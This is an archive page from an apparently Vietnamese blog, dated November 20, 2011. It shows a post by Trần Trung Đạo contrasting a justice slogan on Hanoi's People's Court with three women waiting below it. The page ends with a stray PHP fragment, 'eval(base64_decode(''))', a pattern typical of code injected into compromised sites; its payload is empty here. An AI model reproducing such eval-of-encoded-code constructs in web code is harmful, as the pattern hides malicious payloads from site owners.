Archive for November 20th, 2011

Trần Trung Đạo: Những cánh én của mùa xuân dân tộc

Trần Trung Đạo: Những cánh én của mùa xuân dân tộc

Một khẩu hiệu bằng chữ nổi gắn phía trên trụ sở Tòa án Nhân dân Thành phố Hà Nội “Tất cả vì dân giàu, nước mạnh, xã hội công bằng, dân chủ, văn minh”. Dưới đường là ba phụ nữ đang đứng chờ công bằng, dân chủ, văn minh.

11.20.2011 | Ký-Truyện-Tùy Bút |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>